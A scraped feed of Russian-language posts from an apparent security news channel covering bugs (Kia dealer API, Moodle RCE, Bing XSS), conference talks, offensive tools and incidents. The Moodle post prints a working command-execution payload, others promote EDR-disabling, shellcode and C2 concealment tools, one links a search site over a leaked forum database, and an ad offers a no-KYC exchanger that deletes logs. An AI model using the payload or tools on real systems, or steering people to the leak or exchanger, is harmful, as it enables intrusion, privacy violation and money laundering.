Баг, через который можно угнать все машины от Kia
У Kia есть приложение Connect, через которое можно узнать где находится твоя машина, посигналить, а еще открыть ее и завести. Но как оно понимает, что это твоя машина, а не чужая?
После того, как ты купил Kia, дилер дает тебе ссылку, которая линкует машину с твоей учеткой для входа в само приложение.
Ссылка с одноразовым токеном ведет на сайт дилера. На этом же сайте из JS-кода можно найти эндпоинты, через которые дилер генерит эти ссылки, а еще запросы на то, чтобы управлять машиной.
Кроме того, ты сам можешь зарегаться как дилер, — этот эндпоинт был скрыт, но его получилось найти из-за того, что сайт дилера это форк клиентского API. И читать данные о владельцах чужих машин, а еще управлять ими.
Мораль такая: если ты покупаешь такую машину, помни, что она не становится твоей на 100%. У дилера, вендора и хакеров всегда остаются возможности угнать ее удаленно.
Конференция KazHackStan 2024.
Смотрим записи докладов, собрал самые интересные.
День 1. OSINT
— GEWEL: A structural approach to GEOINT
— Искусство цифровых расследований: фреймворк SOWEL
— OSINT: Недооценённые Dork-запросы
— Социальные графы против киберпреступности
— Obsidian, как саппорт в osint - расследованиях
День 2. Main
— Как взломать любого гражданина Республики Казахстан
— Как защитить Managed Services от RCE
— Разработка защищенных девайсов
— Не трейсингом единым: расследование современных атак на криптокошельки
— Preventing internal data leaks
— Step by Step to BugBounty: Process, Challenges and Solutions
Information Security
— Fighting deepfakes without analyzing the image
— DeFi Exploits and Hacks: реверсим блокчейн-экслоиты
— Android Hardening: закрываем целые классы уязвимостей
— Когда домен истек: превращаем пустяки в серьезную фишинговую угрозу
— Уязвимости банковских систем
Reverse/Malware
— Применение ИИ для анализа вредоносов
— Practical application of full homomorphic encryption for confidential smart contracts and training AI models on encrypted data
— System Persistence Methods Of The STA-2201
— Developing Resilient Detections (with Obfuscation & Evasion in Mind)
— Devirtualization of a protected KoiVM object
— Hacking Process Hacker 2
День 3.
— (|(MaLDAPtive:¯\_(LDAP)_/¯=ObFUsc8t10n) (De-Obfuscation &:=De*te)(!c=tion))
— Web2.5: Pentesting blockchain
— Nuclei Fu
— Security testing of financial services
— Red Team tales: Однажды на Red Team проекте...
— RedTeam: Abusing Google to fight Google
— Бесфайловые атаки: Как злоумышленники внедряют вредоносное ПО без следов на диске
https://blog.redteam-pentesting.de/2024/moodle-rce/
RCE в системе, которую любят использовать вузы во всем мире.
1. Создать вычисляемый вопрос
2. Изменить формулу ответа на
(1)->{system($_GET[chr(97)])}&a=id или любую другую командуuid=33(www-data) gid=33(www-data) groups=33(www-data)Читать полностью…
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
<!DOCTYPE html>
<html dir="ltr" lang="en" xml:lang="en">
<head>
<title>Editing a Calculated question | Test</title>
[...]
CVE-2024-45257
Плохая новость для любителей личных ботнетов: в byob, админке для управления агентами, нашли RCE.
Оригинальный репозиторий собрал почти 9 тысяч звезд на гитхабе, что делает этот C2 одним из самых популярных.
BYOB небезопасно сохраняет эксфильтрированные от агентов файлы. В частности, он использует функцию os.path.join, которая создает сценарии с Directory Traversal.
output_path = os.path.join(os.getcwd(), 'buildyourownbotnet/output', owner, 'files', filename)
filename, можно указать произвольный путь и записать собственный файл в произвольное место на диске.Вторая уязвимость — само выполнение кода, которое стало возможным благодаря передаче пользовательского ввода в функцию subprocess.Popen().
Эта функция вызывается при генерации пэйлоада, а вызов API доступен без авторизации.
https://github.com/Whitecat18/Rust-for-Malware-Development/
Много примеров как писать offensive-утилиты на расте.
Содержимое
— Encryption Methods: AES/RC4/XOR
— Enumeration System
— Stomping injection
— InfoStealer
— Malware Tips: AMSI Bypass, LSASS Dump
— Persistence
— Process-Injection: Local/Remote
— Extract WiFi
— Reverse Shell
— Local/Remote Thread Hijacking
— Windows Threads
— DLL Injection
— Keylogger Dropper
— Shellcode Obfuscation and Deobfuscation
— Shellcode Execution Methods
Полезные ссылки
— Rust Book
— Windows API [old]-(winapi)
— Windows API (by Official Microsoft)
— NtAPI
— Windows Internals
— RedTeam Notes
— Malware Development Essentials
— Rust for CyberSecurity and Red Teaming
Не забываем и о предыдущих постах: как написать свой Cheat Engine на Rust, сниппеты кода для редтима.
ringzer0">Ringzer0 Training
Канал с воркшопами на разные темы.
— Initiation to Car Hacking: Discovering the CAN bus
— Compiler Backdooring For Beginners
— Rust Won't Save Us: Finding And Exploiting 0-Days In Security Appliances
— RISC V Exploit Dev Fun
— Reversing with Ghidra
— Hands-on Binary Deobfuscation
— A Journey into Malicious Code Tradecraft for Windows
— Bypassing Security Perimeters via Vulnerable Devices
— Introduction to Cryptography
— A Journey into Malicious Code Tradecraft for Windows
🔥 А вот и она — долгожданная программа
Мы отобрали доклады для конфы и составляем расписание. Часть его — уже на сайте. Скоро опубликуем программу целиком.
Следите за обновлениями!
Посмотреть программу
Загадки человечества:
— гибель Титаника
— Тунгусский метеорит
— Бермудский треугольник
— как работает ценообразование на C&C?!
1. Cobalt Strike + Core Impact = $12,600 user/year (базовая версия)
2. Nighthawk ($10,000) * 3 (минимальное кол-во лицензий) = $30,000 year
Сегодня список пополнился новым софтом, — 0xc2 https://www.0xc2.io/€4,500 * 2 = €9000 year.
Выглядит так, как будто кто-то форкнул опенсорсный havoc, перекрасил иконки и выставил на продажу.
RedGuard - Excellent C2 Front Flow Control tool
Умный файрволл, который скроет ваш C2 от чужих глаз.
— блокирует песочницы вендоров кибербезопасности на основе JA3 фингерпринтов и обширной базы IP-адресов
— поддерживает контроль входящего трафика для нескольких C&C серверов
— может реализовать domain fronting и осуществить балансировку нагрузки для достижения эффекта скрытности
— умеет в атрибуцию IP-адресов и блокировку по геопозиции
— способен строго проверять входящие http/s запросы на соответствие заданным malleable-профилям
Crack Faster, Hack Smarter: Custom Hashcat Module for Apache Shiro 1 SHA-512
Взламываем на реальном примере кастомный алгоритм хеширования с помощью собственного модуля для hashcat. Официальный Hashcat Plugin Development Guide без подробностей и обновлялся два года назад, так что лучше сохранить эту статью.
Pompompurin (Конор Брайан Фицпатрик) — арестованный владелец киберпреступного BreachForums, отпущенный под залог, продал базу данных собственного форума в июле, и вот она оказалась в публичном доступе.
В дампе:
— никнеймы пользователей
— электронные почты
— активные сессии с IP
— хэшированные алгоритмом Argon2 пароли
— история пополнений баланса на сайте с криптокошельками
— список созданных постов
— внутренние переписки на форуме
— история поиска
— прошлые юзернеймы
Содержимое было опубликовано тут.
А на днях умельцы создали сайт с поиском по этой БД https://bf.based.re/.
https://github.com/lawndoc/Respotter
Ханипот для Responder.
Respotter использует протоколы LLMNR, mDNS и NBNS для поиска несуществующего фальшивого имени хоста (по умолчанию: Loremipsumdolorsitamet). Если на любой из запросов получен ответ, значит, кто-то запустил Responder в вашей сети.
Поддерживает уведомления в Slack, Teams или Discord, а также отправку событий в syslog для занесения событий в SIEM.
SlayerLabs
Если для вас взлом на HackTheBox стал рутиной по поиску эксплойтов для одних и тех же CMS, развернутых по шаблону из одного контейнера, то SlayerLabs предлагают новый опыт.
Разработчики создают лаборатории для пентеста с уникальным лором, сюжетом и оформлением, пример одной из которых можно увидеть в трейлере.
— 6 полигонов с более 130 машинами
— собственный сюжет на каждую компанию
— задания под разные операционные системы
— прописанная вселенная в стиле ретрофутуризма
— для Windows есть лаборатории с 4+ доменами
— чтобы дойти до финала, придется взламывать очень и очень много
— на большинстве полигонов придется писать собственные эксплойты из-за приложений, которые существуют только тут
Ссылка: https://slayerlabs.com/
CVE-2024-38112. Resurrecting Internet Explorer: Threat Actors Using Zero-day Tricks In Internet Shortcut File To Lure Victims.lnk, который выглядит как PDF и возрождает IE из недр Windows. Дальше подгружается и исполняется .hta с полезной нагрузкой.
Обстановка на Земле.
Кто-то шутит про разработчика, который пушнул в прод. Но как говорится "сегодня сбой, завтра атака".
Я вот припоминаю 2019. Тогда Cozy Bear сломали FireEye и распространили свою малварь под видом апдейта для "агента безопасности" SolarWinds Orion.
Кейс 1 в 1
В этом году простые, но сильные баги Web Cache Deception привлекли внимание и стали одними из самых популярных, — благодаря тому, что их легко эксплуатировать и часто это криты (об одном из таких в ChatGPT я рассказывал тут).
PortSwigger не остались в стороне и написали по ним свой собственный ресерч Gotta cache 'em all: bending the rules of web cache exploitation, рассказали о своих находках на Black Hat USA 2024, и выпустили лабы, чтобы разобраться самим "что да как".
Теория
Web cache deception Overview
Web caches
— Cache keys
— Cache rules
Constructing a web cache deception attack
— Using a cache buster
— Detecting cached responses
Exploiting static extension cache rules
— Path mapping discrepancies
— Exploiting path mapping discrepancies
— Delimiter discrepancies
— Exploiting delimiter discrepancies
— Delimiter decoding discrepancies
— Exploiting delimiter decoding discrepancies
Exploiting static directory cache rules
— Normalization discrepancies
— Detecting normalization by the origin server
— Detecting normalization by the cache server
— Exploiting normalization by the origin server
— Exploiting normalization by the cache server
Exploiting file name cache rules
— Detecting normalization discrepancies
— Exploiting normalization discrepancies
Preventing web cache deception vulnerabilities
Практика
— Exploiting path mapping for web cache deception
— Exploiting path delimiters for web cache deception
— Exploiting origin server normalization for web cache deception
— Exploiting cache server normalization for web cache deception
— Exploiting exact-match cache rules for web cache deception
OffSec анонсировали изменения для OSCP
Первое изменение. С 1 ноября 2024 года уберут бонусные баллы, которые можно было накопить, выполнив 80% упражнений для подготовки к экзамену на портале.
Цель OffSec — использовать материалы курса и обучение для подготовки к экзамену, а не использовать материалы курса и обучение как часть экзамена.
Знак "+" подчеркивает приверженность учащегося непрерывному обучению и стремлению оставаться в курсе событий в постоянно развивающейся области.Читать полностью…
SSRFing the Web with the Help of Copilot Studio
У Microsoft существует сервис Copilot Studio, чтобы создавать AI боты. В ответ на фразу можно настроить HTTP-запрос, а в качестве URL — указать внутренний хост.
Классический SSRF, но кроме IMDS (сервис с метадатой), тут получилось обратиться к внутренней Cosmos DB на чтение и запись.
Так что если ищете баги в сервисах из Azure, имейте ввиду, что к ней можно обращаться и по HTTP, чтобы сделать красивый PoC в связке с ликнутыми токенами из IMDS.
https://github.com/projectdiscovery/tldfinder
У ICANN, организации которая координирует работу корневых DNS, существует список со всеми существующими Top Level доменами. Помимо привычных .com/.org/.net, в нем можно встретить и много необычных, о которых вы могли и не слышать, вроде .google, .gucci или .netflix, которыми управляют одноименные компании.
Вот 3 валидных примера:
— cloud.google
— design.google
— travel.google
Как говорил исследователь Jason Haddix на своем курсе Bug Hunter's Methodology Live Course:
За каждый домен .apex, который вы найдете, у вас в 4 раза больше шансов взломать цель
Ошибка Microsoft ценой в несколько тысяч долларов
Bingbot, поисковой бот от Microsoft, индексирует видео с разных сайтов: VK, Tiktok, Instagram, и Youtube, чтобы отображать их у себя в поиске.
Помимо самих видео, он парсит и их атрибуты, такие как название и описание. Если залить видео на хостинг, то бот, спустя некоторое время, получит его и начнет отдавать метадату по адресу https://www.bing.com/videos/vdasync?mid={mid}.
Эта метадата выглядит как обычный JSON, за которым, при открытии бинга, ходит браузер пользователя. Но вместо правильного applicarion/json, в ответе по этому адресу возвращается тип контента text/html; charset=utf-8.
Поэтому если в названии видео добавить полезную нагрузку с HTLM-тегами, бот ее успешно распарсит и захостит твою XSS-ку "как есть" на главном домене bing.com.
Баг был найден первого июля, а сумма выплаты составила $3000.
https://github.com/TheWover/donut
Генератор шелл-кода и лоадер в одном флаконе.
По возможностям так:
— Compression of input files with aPLib and LZNT1, Xpress, Xpress Huffman via RtlCompressBuffer.
— Using entropy for API hashes and generation of strings.
— 128-bit symmetric encryption of files.
— Overwriting native PE headers.
— Storing native PEs in MEM_IMAGE memory.
— Patching Antimalware Scan Interface (AMSI) and Windows Lockdown Policy (WLDP).
— Patching Event Tracing for Windows (ETW).
— Patching command line for EXE files.
— Patching exit-related API to avoid termination of host process.
— Multiple output formats: C, Ruby, Python, PowerShell, Base64, C#, Hexadecimal, and UUID string.
Свежее издание phrack
С момента выхода прошлого выпуска культового журнала прошло 3 года.
Release date : 2024-08-19
После нескольких последних десятилетий, когда человечество выложило все свои коллективные знания в сеть, мы видим все больше способов помешать нам получить к ним доступ. Не только хорошую информацию сложнее найти, плохая информация заглушает ее.
Растут стимулы присматривать и собирать ренту за важными ресурсами, а также распространять мусор, который в лучшем случае бесполезен, а в худшем — вреден.
Во всем этом хаосе реальная угроза — потеря полезной, проверенной и надежной информации ради монетизации противоположного.
Мы можем двигаться вперед через эту чушь. Мы можем работать вместе, чтобы поддерживать
хорошую информацию и усиливать голоса тех, кто ее создает и кураторствует. Мы можем узнать, как все на самом деле работает, делиться подробностями и использовать эти механизмы, чтобы делать что-то хорошее
bbradar.io
Я часто ловлю себя на мысли, что мне приходится тратить много сил и времени только на то, чтобы уследить за новыми программами на всех Bug Bounty площадках, где я работаю.
Последнее время меня стал раздражать этот процесс, поэтому я решил создать небольшое приложение-трекер, чтобы объединить последние общедоступные программы.
Надеюсь, это поможет вам быстрее выбрать понравившуюся программу и позволит сосредоточить всю свою энергию на реальном исследовании.
Всем привет!
Недавно разбирал по шагам всю attack.mitre.org и обнаружил интересную технику Compromise Host Software Binary T1554 , которая описывается как Adversaries may modify host software binaries to establish persistent access to systems. Это достаточно перспективный способ закрепления, явно отличающийся своей уникальностью. Помимо того, существует возможность модификации существующих файлов без порчи их цифровой подписи (например, через MST-файлы (ищите раздел "Running a signed MSI as non-admin")). Однако, я не встречал особо много статей, которые бы явно отсылали нас к этой технике.
Собственно, отсутствие материала и побудило меня написать небольшую статью на тему того, как можно инфицировать .NET-сборки :))
Так родился новый материал Карантин! Инфицируем .NET-сборки как настоящий APT .
Приятного чтения :)
EDRSilencer
EDRSilencer — "убийца EDR", как FireBlock от MdSec, но опенсорсный и бесплатный. Полностью отключает отправку каких-либо событий EDR с помощью легитимного WFP API в Windows.
Список средств защиты, которые перестанут "отстукивать":
— Microsoft Defender for Endpoint and Microsoft Defender Antivirus
— Elastic EDR
— Trellix EDR
— Qualys EDR
— SentinelOne
— Cylance
— Cybereason
— Carbon Black EDR
— Carbon Black Cloud
— Tanium
— Palo Alto Networks Traps/Cortex XDR
— FortiEDR
— Cisco Secure Endpoint (Formerly Cisco AMP)
— ESET Inspect
— Harfanglab EDR
— TrendMicro Apex One
На видео пример работы Fireblock и дампа LSASS под носом у работающего Defender.
Red Team Interview Questions
Репозиторий, охватывающий широкий спектр тем и вопросов для кандидатов на собеседование, которые готовятся работать пентестерами в составе красной команды.
1. Initial Access
2. Windows Network
3. Active Directory
4. OS Language Programming
5. PowerShell
6. Windows Internals
7. DNS Server
8. Windows API
9. Macro Attack
10. APT Groups
11. EDR and Antivirus
12. Malware Development
13. System & Kernel Programming
14. Privilege Escalation
15. Post-exploitation (and Lateral Movement)
16. Persistence
17. Breaking Hash
18. C&C (Command and Control)
19. DLL
20. DNS Rebinding
21. LDAP
22. Evasion
23. Steganography
24. Kerberoasting and Kerberos
25. Mimikatz
26. RDP
27. NTLM
28. YARA Language
29. Windows API And DLL Difference
30. Antivirus and EDR Difference
31. NTDLL
32. Native API
33. Windows Driver
34. Tunneling
35. Shadow File
36. SAM File
37. LSA
38. LSASS
39. WDIGEST
40. CredSSP
41. MSV
42. LiveSSP
43. TSpkg
44. CredMan
45. EDR NDR XDR
46. Polymorphic Malware
47. Pass-the-Hash, Pass-the-Ticket or Build Golden Tickets
48. Firewall
49. WinDBG (Windows Debugger)
50. PE (Portable Executable)
51. ICMP
52. Major Microsoft frameworks for Windows
53. Services and Processes
54. svchost
55. CIM Class
56. CDB, NTSD, KD, Gflags, GflagsX, PE Explorer
57. Sysinternals Suite (tools)
58. Undocumented Functions
59. Process Explorer vs Process Hacker
60. CLR (Common Language Runtime)
Другие посты, которые я публиковал ранее
— вопросы на разные темы от действующего сотрудника Google
— 33 вопроса о веб-уязвимостях для самоподготовки
Анонимные транзакции тут!
❤️CoinCross – криптообменник нового поколения представляет обмен из крипты на банки / крипту / наличные по всей РФ.
Чтобы не потерять нас, сохраняйте пост в избранное. Работаем без KYC и AML-поверок, не задаем лишних вопросов, не интересуемся, кто вы, удаляем логи обмена.
Меняем бесперебойно 24/7.
💻 Сайт – CoinCross.one
❤️ Телеграм канал – @coincross
Плохой OPSEC
14 мая 2021 года газета The New York Times со ссылкой на одного из сенаторов кратко упомянула в своей статье, что внуки Байдена любят навещать своего дедушку в Белом доме и показывать видео из Tiktok, а тот им иногда присылает деньги на карманные расходы в Venmo.
Тогда никто не обратил внимание на эти факты, но на днях журналисты из BuzzFeed выпустили статью, где рассказали о проблемах сервиса: после запуска, приложение просит список контактов (как и Telegram), которые не закрыты настройками приватности.
Более того, и платежи по умолчанию доступны всем. У Байдена они были скрыты, но не у его внуков: обратным поиском от внуков к "единственному незнакомцу, который регулярно присылает им деньги", удалось построить граф со всем окружением президента.
Заканчиваем день с признанием того самого сотрудника, выпустившего роковое обновление.
Видео выложил глава CrowdStrike с комментарием
Это не инцидент безопасности или кибератака. Проблема была выявлена, изолирована и исправлена. Мы направляем клиентов на портал поддержки для получения последних обновлений и продолжим предоставлять полные и постоянные обновления на нашем сайте.
Пишут, что CrowdStrike обновила Falcon Sensor, и начался сущий кошмар. По всему миру встали аэропорты, телеканалы, банки, магазины и не только — у всех синий экран смерти.
Хотфикс следующий
1. Boot Windows into Safe Mode or the Windows Recovery Environment
2 Navigate to the C:\Windows\System32\drivers\CrowdStrike directory
3. Locate the file matching “C-00000291*.sys”, and delete it.
4. Boot the host normally.
